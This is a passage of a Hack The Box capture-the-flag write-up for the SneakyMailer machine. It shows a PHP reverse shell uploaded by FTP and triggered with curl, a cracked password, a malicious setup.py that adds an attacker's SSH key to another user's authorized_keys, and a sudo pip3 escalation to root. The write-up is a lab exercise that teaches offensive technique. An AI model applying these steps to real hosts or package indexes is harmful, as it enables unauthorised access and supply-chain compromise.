<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td> --><td class="rouge-code"><pre>ftp&gt; put rev.php
<span class="nb">local</span>: rev.php remote: rev.php
200 PORT <span class="nb">command </span>successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5493 bytes sent <span class="k">in </span>0.00 secs <span class="o">(</span>26.4572 MB/s<span class="o">)</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Seems there is cron running which deletes the uploaded files so we need to be quick and trigger it to get a reverse shell:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/sneakymailer
‚Üí curl http://dev.sneakycorp.htb/rev.php
</pre></td></tr></tbody></table></code></pre></div></div>

<h4 id="www-data-shell">www-data shell</h4>

<p>Getting a call back on <code class="language-plaintext highlighter-rouge">nc</code> listener:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/sneakymailer
‚Üí nc <span class="nt">-lvnp</span> 8020
Ncat: Version 7.91 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span>
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 10.10.10.197.
Ncat: Connection from 10.10.10.197:50844.
Linux sneakymailer 4.19.0-9-amd64 <span class="c">#1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux</span>
 12:36:06 up 13 min,  0 <span class="nb">users</span>,  load average: 0.03, 0.04, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
<span class="nv">uid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span>
/bin/sh: 0: can<span class="s1">'t access tty; job control turned off
$ python3 -c "import pty;pty.spawn('</span>/bin/bash<span class="s1">')"
www-data@sneakymailer:/$ whoami
whoami
www-data
</span></pre></td></tr></tbody></table></code></pre></div></div>

<h2 id="elevating-priv-www-data---low">Elevating Priv www-data -&gt; low</h2>

<h3 id="enumeration">Enumeration</h3>

<p>Initial enumeration reveals that user flag is located inside home directory of user <code class="language-plaintext highlighter-rouge">low</code> and we don‚Äôt have the permission to read it.</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
</pre></td> --><td class="rouge-code"><pre>www-data@sneakymailer:/home<span class="nv">$ </span><span class="nb">ls
</span>low  vmail

www-data@sneakymailer:/home/low<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-la</span>
total 8
www-data@sneakymailer:/home/low<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-la</span>
<span class="nb">ls</span> <span class="nt">-la</span>
total 48
drwxr-xr-x 8 low  low  4096 Jun  8 03:47 <span class="nb">.</span>
drwxr-xr-x 4 root root 4096 May 14  2020 ..
lrwxrwxrwx 1 root root    9 May 19  2020 .bash_history -&gt; /dev/null
<span class="nt">-rw-r--r--</span> 1 low  low   220 May 14  2020 .bash_logout
<span class="nt">-rw-r--r--</span> 1 low  low  3526 May 14  2020 .bashrc
drwxr-xr-x 3 low  low  4096 May 16  2020 .cache
drwx------ 3 low  low  4096 May 14  2020 .gnupg
drwxr-xr-x 3 low  low  4096 May 16  2020 .local
dr-x------ 2 low  low  4096 May 16  2020 .pip
<span class="nt">-rw-r--r--</span> 1 low  low   807 May 14  2020 .profile
drwxr-xr-x 2 low  low  4096 Jun  8 03:47 .ssh
<span class="nt">-rwxr-x---</span> 1 root low    33 Dec  1 11:35 user.txt
drwxr-xr-x 6 low  low  4096 May 16  2020 venv
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Now this is where things get interesting cause based on the second mail inside paul‚Äôs mailbox, user low has to install, test and erase python module in PyPI service.</p>

<p><img src="/assets/img/Posts/SneakyM/low.png" alt="low" /></p>

<h3 id="pypi-service">PyPI service</h3>

<p><code class="language-plaintext highlighter-rouge">ss</code> output shows there is service listening on 127.0.0.1:5000 which could be the PyPI service we are looking for.</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td> --><td class="rouge-code"><pre>www-data@sneakymailer:/<span class="nv">$ </span>ss <span class="nt">-tnlp</span>
ss <span class="nt">-tnlp</span>
State     Recv-Q    Send-Q       Local Address:Port        Peer Address:Port
LISTEN    0         5                127.0.0.1:5000             0.0.0.0:<span class="k">*</span>
LISTEN    0         128                0.0.0.0:80               0.0.0.0:<span class="k">*</span>        <span class="nb">users</span>:<span class="o">((</span><span class="s2">"nginx"</span>,pid<span class="o">=</span>764,fd<span class="o">=</span>8<span class="o">)</span>,<span class="o">(</span><span class="s2">"nginx"</span>,pid<span class="o">=</span>763,fd<span class="o">=</span>8<span class="o">))</span>
LISTEN    0         128                0.0.0.0:8080             0.0.0.0:<span class="k">*</span>        <span class="nb">users</span>:<span class="o">((</span><span class="s2">"nginx"</span>,pid<span class="o">=</span>764,fd<span class="o">=</span>6<span class="o">)</span>,<span class="o">(</span><span class="s2">"nginx"</span>,pid<span class="o">=</span>763,fd<span class="o">=</span>6<span class="o">))</span>
LISTEN    0         128                0.0.0.0:22               0.0.0.0:<span class="k">*</span>
LISTEN    0         100                0.0.0.0:25               0.0.0.0:<span class="k">*</span>
<span class="o">[</span>..SNIP..]
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Inside the home directory of www-data we find another subdomain <code class="language-plaintext highlighter-rouge">pypi.sneakycorp.htb</code> which we‚Äôll add to our hosts file:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td> --><td class="rouge-code"><pre>www-data@sneakymailer:~<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-la</span>
<span class="nb">ls</span> <span class="nt">-la</span>
total 24
drwxr-xr-x  6 root root 4096 May 14  2020 <span class="nb">.</span>
drwxr-xr-x 12 root root 4096 May 14  2020 ..
drwxr-xr-x  3 root root 4096 Jun 23 08:15 dev.sneakycorp.htb
drwxr-xr-x  2 root root 4096 May 14  2020 html
drwxr-xr-x  4 root root 4096 May 15  2020 pypi.sneakycorp.htb
drwxr-xr-x  8 root root 4096 Jun 23 09:48 sneakycorp.htb
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Although if we try to visit <a href="http://pypi.sneakycorp.htb">http://pypi.sneakycorp.htb</a> we get redirected to sneakycorp.htb</p>

<p>Based on our nmap scan we saw nginx is in use, looking at the nginx config files we see <code class="language-plaintext highlighter-rouge">pypi.sneakycorp.htb</code> is one of active sites:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td> --><td class="rouge-code"><pre>www-data@sneakymailer:/etc/nginx/sites-enabled<span class="nv">$ </span><span class="nb">ls
</span>pypi.sneakycorp.htb  sneakycorp.htb
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Inside config file we see <code class="language-plaintext highlighter-rouge">pypi.sneakycorp.htb:8080</code> will proxy through 127.0.0.1:5000, where is PyPi service is listening</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
</pre></td> --><td class="rouge-code"><pre><span class="n">www</span><span class="o">-</span><span class="n">data</span><span class="err">@</span><span class="n">sneakymailer</span><span class="o">:/</span><span class="n">etc</span><span class="o">/</span><span class="n">nginx</span><span class="o">/</span><span class="n">sites</span><span class="o">-</span><span class="n">enabled</span><span class="err">$</span> <span class="n">cat</span> <span class="n">pypi</span><span class="p">.</span><span class="n">sneakycorp</span><span class="p">.</span><span class="n">htb</span>

<span class="n">server</span> <span class="p">{</span>
        <span class="n">listen</span> <span class="mi">0</span><span class="p">.</span><span class="mi">0</span><span class="p">.</span><span class="mi">0</span><span class="p">.</span><span class="mi">0</span><span class="o">:</span><span class="mi">8080</span> <span class="n">default_server</span><span class="p">;</span>
        <span class="n">listen</span> <span class="p">[</span><span class="o">::</span><span class="p">]</span><span class="o">:</span><span class="mi">8080</span> <span class="n">default_server</span><span class="p">;</span>
        <span class="n">server_name</span> <span class="n">_</span><span class="p">;</span>
<span class="p">}</span>


<span class="n">server</span> <span class="p">{</span>
        <span class="n">listen</span> <span class="mi">0</span><span class="p">.</span><span class="mi">0</span><span class="p">.</span><span class="mi">0</span><span class="p">.</span><span class="mi">0</span><span class="o">:</span><span class="mi">8080</span><span class="p">;</span>
        <span class="n">listen</span> <span class="p">[</span><span class="o">::</span><span class="p">]</span><span class="o">:</span><span class="mi">8080</span><span class="p">;</span>

        <span class="n">server_name</span> <span class="n">pypi</span><span class="p">.</span><span class="n">sneakycorp</span><span class="p">.</span><span class="n">htb</span><span class="p">;</span>

        <span class="n">location</span> <span class="o">/</span> <span class="p">{</span>
                <span class="n">proxy_pass</span> <span class="n">http</span><span class="o">:</span><span class="c1">//127.0.0.1:5000;</span>
                <span class="n">proxy_set_header</span> <span class="n">Host</span> <span class="err">$</span><span class="n">host</span><span class="p">;</span>
                <span class="n">proxy_set_header</span> <span class="n">X</span><span class="o">-</span><span class="n">Real</span><span class="o">-</span><span class="n">IP</span> <span class="err">$</span><span class="n">remote_addr</span><span class="p">;</span>
        <span class="p">}</span>
<span class="p">}</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Now we can visit <code class="language-plaintext highlighter-rouge">pypi.sneakycorp.htb:8080</code> which clearly indicates we can create our malicious python package and host it on pypi server.</p>

<p><img src="/assets/img/Posts/SneakyM/pypi.png" alt="pypi" /></p>

<p>To upload the python package we‚Äôll need to be authenticated, inside <code class="language-plaintext highlighter-rouge">pypi.sneakycorp.htb</code> directory we find a <code class="language-plaintext highlighter-rouge">.htpasswd</code> file containing password hash:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td> --><td class="rouge-code"><pre>www-data@sneakymailer:~/pypi.sneakycorp.htb<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-la</span>
total 20
drwxr-xr-x 4 root root     4096 May 15  2020 <span class="nb">.</span>
drwxr-xr-x 6 root root     4096 May 14  2020 ..
<span class="nt">-rw-r--r--</span> 1 root root       43 May 15  2020 .htpasswd
drwxrwx--- 2 root pypi-pkg 4096 Jun 30 02:24 packages
drwxr-xr-x 6 root pypi     4096 May 14  2020 venv
www-data@sneakymailer:~/pypi.sneakycorp.htb<span class="nv">$ </span><span class="nb">cat</span> .htpasswd
pypi:<span class="nv">$apr1$RV5c5YVs$U9</span>.OTqF5n8K4mxWpSSR/p/
</pre></td></tr></tbody></table></code></pre></div></div>

<p>We can crack it using john which results the creds as <code class="language-plaintext highlighter-rouge">pypi:soufianeelhaoui</code></p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/sneakymailer
‚Üí john <span class="nt">--show</span> pypi.hash
pypi:soufianeelhaoui

1 password <span class="nb">hash </span>cracked, 0 left
</pre></td></tr></tbody></table></code></pre></div></div>

<h3 id="malicious-python-package">Malicious Python Package</h3>

<p>With reference to this <a href="https://www.linode.com/docs/guides/how-to-create-a-private-python-package-repository/"><strong>article</strong></a> we can create and upload our malicious python package to PyPi server</p>

<ul>
  <li>Step1 : Creating all the required files</li>
</ul>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
</pre></td> --><td class="rouge-code"><pre>www-data@sneakymailer:/tmp<span class="nv">$ </span><span class="nb">mkdir </span>coldfx

www-data@sneakymailer:/tmp<span class="nv">$ </span><span class="nb">cd </span>coldfx

www-data@sneakymailer:/tmp/coldfx<span class="nv">$ </span><span class="nb">touch </span>setup.py setup.cfg README.md .pypirc

www-data@sneakymailer:/tmp/coldfx<span class="nv">$ </span><span class="nb">mkdir </span>cfx-key

www-data@sneakymailer:/tmp/coldfx<span class="nv">$ </span><span class="nb">cd </span>cfx-key

www-data@sneakymailer:/tmp/coldfx/cfx<span class="nv">$ </span><span class="nb">touch </span>__init__.py

www-data@sneakymailer:/tmp/coldfx<span class="nv">$ </span>find <span class="nb">.</span>
find <span class="nb">.</span>
<span class="nb">.</span>
./cfx-key
./cfx-key/__init__.py
./.pypirc
./setup.cfg
./README.md
./setup.py
</pre></td></tr></tbody></table></code></pre></div></div>
<p>When we are running a python script, <code class="language-plaintext highlighter-rouge">__init__.py</code> is the file which it looks for loading the package.</p>

<ul>
  <li>Step2 : Now using nano we‚Äôll input data into these files which is required for the package to run.</li>
</ul>

<p>Adding an example function to <code class="language-plaintext highlighter-rouge">__init__.py</code> inside cfx-key directory</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre>www-data@sneakymailer:/tmp/coldfx/cfx-key<span class="nv">$ </span><span class="nb">cat </span>__init__.py
def hello_word<span class="o">()</span>:
print<span class="o">(</span>‚Äúhello world‚Äù<span class="o">)</span>
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Defining server &amp; authentication details into <code class="language-plaintext highlighter-rouge">.pypirc</code>:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td> --><td class="rouge-code"><pre>www-data@sneakymailer:/tmp/coldfx<span class="nv">$ </span><span class="nb">cat</span> .pypirc
<span class="o">[</span>distutils]
index-servers <span class="o">=</span> cfx-key

<span class="o">[</span>cfx-key]
repository: http://pypi.sneakycorp.htb:8080
username: pypi
password: soufianeelhaoui
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Adding metadata:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre>www-data@sneakymailer:/tmp/coldfx<span class="nv">$ </span><span class="nb">cat </span>setup.cfg
<span class="o">[</span>metadata]
description-file <span class="o">=</span> README.md
</pre></td></tr></tbody></table></code></pre></div></div>

<ul>
  <li>Step3 : Creating <code class="language-plaintext highlighter-rouge">setup.py</code> to a ssh key to low‚Äôs account:</li>
</ul>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre></td> --><td class="rouge-code"><pre><span class="kn">from</span> <span class="nn">setuptools</span> <span class="kn">import</span> <span class="n">setup</span>

<span class="k">try</span><span class="p">:</span>
    <span class="k">with</span> <span class="nb">open</span> <span class="p">(</span><span class="s">'/home/low/.ssh/authorized_keys'</span><span class="p">,</span> <span class="s">'a'</span><span class="p">)</span> <span class="k">as</span> <span class="n">fl</span><span class="p">:</span>
        <span class="n">fl</span><span class="p">.</span><span class="n">write</span> <span class="p">(</span><span class="s">"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC+OOk/amwKEW/gfCikP+y0hqTkgXyICKUegxd2bZCr7CdbACbL+zJn9cV6T4XutmP6JOetxFytws9yO01X2kxkRRhIKH8DFpall5smoaJ1biwOsd6QHQJ7QLsMQIyzhy2qbq1rmi9ubSagBU9qmV4XbQwIM8fpapyV [..SNIP..] root@cfx"</span><span class="p">)</span>

<span class="k">except</span><span class="p">:</span>
    <span class="n">setup</span><span class="p">(</span>
    <span class="n">name</span><span class="o">=</span><span class="s">'cfx-key'</span><span class="p">,</span>
    <span class="n">packages</span><span class="o">=</span><span class="p">[</span><span class="s">'cfx-key'</span><span class="p">],</span>
    <span class="n">description</span><span class="o">=</span><span class="s">'Hello world enterprise edition'</span><span class="p">,</span>
    <span class="n">version</span><span class="o">=</span><span class="s">'0.1'</span><span class="p">,</span>
    <span class="n">url</span><span class="o">=</span><span class="s">'http://sneakycorp.htb'</span><span class="p">,</span>
    <span class="n">author</span><span class="o">=</span><span class="s">'coldfusionx'</span><span class="p">,</span>
    <span class="n">author_email</span><span class="o">=</span><span class="s">'coldfusionx@htb'</span><span class="p">,</span>
    <span class="n">keywords</span><span class="o">=</span><span class="p">[</span><span class="s">'pip'</span><span class="p">,</span><span class="s">'cfx-key'</span><span class="p">,</span><span class="s">'example'</span><span class="p">]</span>
    <span class="p">)</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<ul>
  <li>Step4: Creating Package</li>
</ul>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
</pre></td> --><td class="rouge-code"><pre>www-data@sneakymailer:/tmp/coldfx<span class="nv">$ </span>python3 setup.py sdist
running sdist
running egg_info
creating cfx_key.egg-info
writing cfx_key.egg-info/PKG-INFO
writing dependency_links to cfx_key.egg-info/dependency_links.txt
writing top-level names to cfx_key.egg-info/top_level.txt
writing manifest file <span class="s1">'cfx_key.egg-info/SOURCES.txt'</span>
reading manifest file <span class="s1">'cfx_key.egg-info/SOURCES.txt'</span>
writing manifest file <span class="s1">'cfx_key.egg-info/SOURCES.txt'</span>
running check
creating cfx-key-0.1
creating cfx-key-0.1/cfx-key
creating cfx-key-0.1/cfx_key.egg-info
copying files to cfx-key-0.1...
copying README.md -&gt; cfx-key-0.1
copying setup.cfg -&gt; cfx-key-0.1
copying setup.py -&gt; cfx-key-0.1
copying cfx-key/__init__.py -&gt; cfx-key-0.1/cfx-key
copying cfx_key.egg-info/PKG-INFO -&gt; cfx-key-0.1/cfx_key.egg-info
copying cfx_key.egg-info/SOURCES.txt -&gt; cfx-key-0.1/cfx_key.egg-info
copying cfx_key.egg-info/dependency_links.txt -&gt; cfx-key-0.1/cfx_key.egg-info
copying cfx_key.egg-info/top_level.txt -&gt; cfx-key-0.1/cfx_key.egg-info
Writing cfx-key-0.1/setup.cfg
creating dist
Creating <span class="nb">tar </span>archive
removing <span class="s1">'cfx-key-0.1'</span> <span class="o">(</span>and everything under it<span class="o">)</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<ul>
  <li>Step 5: Uploading Package</li>
</ul>

<p>Before uploading package we need to ensure <code class="language-plaintext highlighter-rouge">.pypirc</code> is present inside the home directory, so we‚Äôll define our current directory as home.</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre>www-data@sneakymailer:/tmp/coldfx<span class="nv">$ </span><span class="nb">export </span><span class="nv">HOME</span><span class="o">=</span>/tmp/coldfx
www-data@sneakymailer:~<span class="nv">$ </span><span class="nb">echo</span> <span class="nv">$HOME</span>
/tmp/coldfx
</pre></td></tr></tbody></table></code></pre></div></div>
<p>So now basically we are /tmp/coldfx is the home directory.</p>

<h4 id="uploading">Uploading</h4>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
</pre></td> --><td class="rouge-code"><pre>www-data@sneakymailer:~<span class="nv">$ </span>python3 setup.py sdist upload <span class="nt">-r</span> cfx-key
running sdist
running egg_info
writing cfx_key.egg-info/PKG-INFO
writing dependency_links to cfx_key.egg-info/dependency_links.txt
writing top-level names to cfx_key.egg-info/top_level.txt
reading manifest file <span class="s1">'cfx_key.egg-info/SOURCES.txt'</span>
writing manifest file <span class="s1">'cfx_key.egg-info/SOURCES.txt'</span>
running check
creating cfx-key-0.1
creating cfx-key-0.1/cfx-key
creating cfx-key-0.1/cfx_key.egg-info
copying files to cfx-key-0.1...
copying README.md -&gt; cfx-key-0.1
copying setup.cfg -&gt; cfx-key-0.1
copying setup.py -&gt; cfx-key-0.1
copying cfx-key/__init__.py -&gt; cfx-key-0.1/cfx-key
copying cfx_key.egg-info/PKG-INFO -&gt; cfx-key-0.1/cfx_key.egg-info
copying cfx_key.egg-info/SOURCES.txt -&gt; cfx-key-0.1/cfx_key.egg-info
copying cfx_key.egg-info/dependency_links.txt -&gt; cfx-key-0.1/cfx_key.egg-info
copying cfx_key.egg-info/top_level.txt -&gt; cfx-key-0.1/cfx_key.egg-info
Writing cfx-key-0.1/setup.cfg
Creating <span class="nb">tar </span>archive
removing <span class="s1">'cfx-key-0.1'</span> <span class="o">(</span>and everything under it<span class="o">)</span>
running upload
Submitting dist/cfx-key-0.1.tar.gz to http://pypi.sneakycorp.htb:8080
Server response <span class="o">(</span>200<span class="o">)</span>: OK
WARNING: Uploading via this <span class="nb">command </span>is deprecated, use twine to upload instead <span class="o">(</span>https://pypi.org/p/twine/<span class="o">)</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<h3 id="ssh-as-low">SSH as low</h3>

<p>We can confirm if our ssh was successfully written inside the ssh directory of user low:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td> --><td class="rouge-code"><pre>www-data@sneakymailer:~<span class="nv">$ </span><span class="nb">cat</span> /home/low/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC+OOk/amwKEW/gfCikP+y0hqTkgXyICKUegxd2bZCr7CdbACbL+zJn9cV6T4XutmP6JOetxFytws9yO01X2kxkRRhIKH8DFpall5smoaJ1biwOsd6QHQJ7QLsMQIyzhy2qbq1rmi9ubSagBU9qmV4XbQwIM8fpapyV+cWZjvbdJWNVN5ofUBsobDL80GrzqHyde8Luijn2wsYa8/sfLtkNcvA251p20CV+Vbn7Pb72RTG/[..SNIP..]J3BAqVKtdqp4x6iVPlFaxaujgrM<span class="o">=</span> root@cfx
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Now we can SSH as low using our private key:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
</pre></td> --><td class="rouge-code"><pre>cfx:  ~/Documents/htb/sneakymailer
‚Üí ssh <span class="nt">-i</span> cfx-key low@10.10.10.197
Linux sneakymailer 4.19.0-9-amd64 <span class="c">#1 SMP Debian 4.19.118-2 (2020-04-29) x86_64</span>

The programs included with the Debian GNU/Linux system are free software<span class="p">;</span>
the exact distribution terms <span class="k">for </span>each program are described <span class="k">in </span>the
individual files <span class="k">in</span> /usr/share/doc/<span class="k">*</span>/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Tue Jun  9 03:02:52 2020 from 192.168.56.105

low@sneakymailer:~<span class="nv">$ </span><span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>1000<span class="o">(</span>low<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1000<span class="o">(</span>low<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1000<span class="o">(</span>low<span class="o">)</span>,24<span class="o">(</span>cdrom<span class="o">)</span>,25<span class="o">(</span>floppy<span class="o">)</span>,29<span class="o">(</span>audio<span class="o">)</span>,30<span class="o">(</span>dip<span class="o">)</span>,44<span class="o">(</span>video<span class="o">)</span>,46<span class="o">(</span>plugdev<span class="o">)</span>,109<span class="o">(</span>netdev<span class="o">)</span>,111<span class="o">(</span>bluetooth<span class="o">)</span>,119<span class="o">(</span>pypi-pkg<span class="o">)</span>

low@sneakymailer:~<span class="nv">$ </span><span class="nb">whoami
</span>low
</pre></td></tr></tbody></table></code></pre></div></div>

<h4 id="grabbing-usertxt">Grabbing user.txt</h4>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre>low@sneakymailer:~<span class="nv">$ </span><span class="nb">cat </span>user.txt
646719dd8b4f89<span class="k">******************</span>

</pre></td></tr></tbody></table></code></pre></div></div>
<h2 id="elevating-priv-low---root">Elevating Priv: low -&gt; root</h2>

<p>Checking out our sudo privileges using <code class="language-plaintext highlighter-rouge">sudo -l</code> results our next privilege escalation vector:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td> --><td class="rouge-code"><pre>low@sneakymailer:~<span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-l</span>
<span class="nb">sudo</span>: unable to resolve host sneakymailer: Temporary failure <span class="k">in </span>name resolution
Matching Defaults entries <span class="k">for </span>low on sneakymailer:
    env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin

User low may run the following commands on sneakymailer:
    <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/bin/pip3
</pre></td></tr></tbody></table></code></pre></div></div>

<p>With reference to <a href="https://gtfobins.github.io/gtfobins/pip/"><strong>gtfo</strong></a> we can escalate to root:</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td> --><td class="rouge-code"><pre>low@sneakymailer:~<span class="nv">$ TF</span><span class="o">=</span><span class="si">$(</span><span class="nb">mktemp</span> <span class="nt">-d</span><span class="si">)</span>
low@sneakymailer:~<span class="nv">$ </span><span class="nb">echo</span> <span class="s2">"import os; os.execl('/bin/sh', 'sh', '-c', 'sh &lt;</span><span class="si">$(</span><span class="nb">tty</span><span class="si">)</span><span class="s2"> &gt;</span><span class="si">$(</span><span class="nb">tty</span><span class="si">)</span><span class="s2"> 2&gt;</span><span class="si">$(</span><span class="nb">tty</span><span class="si">)</span><span class="s2">')"</span> <span class="o">&gt;</span> <span class="nv">$TF</span>/setup.py
low@sneakymailer:~<span class="nv">$ </span><span class="nb">sudo </span>pip3 <span class="nb">install</span> <span class="nv">$TF</span>
<span class="nb">sudo</span>: unable to resolve host sneakymailer: Temporary failure <span class="k">in </span>name resolution
Processing /tmp/tmp.naFm00Qgl3
<span class="c"># id</span>
<span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span>
<span class="c"># whoami</span>
root
</pre></td></tr></tbody></table></code></pre></div></div>
<h4 id="grabbing-roottxt">Grabbing root.txt</h4>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre><span class="c"># cat /root/root.txt</span>
a311d05bde9ed4<span class="k">******************</span>

</pre></td></tr></tbody></table></code></pre></div></div>

<p>And we pwned the Box !</p>

<p>Thanks for reading, Suggestions &amp; Feedback are appreciated !</p>
:ET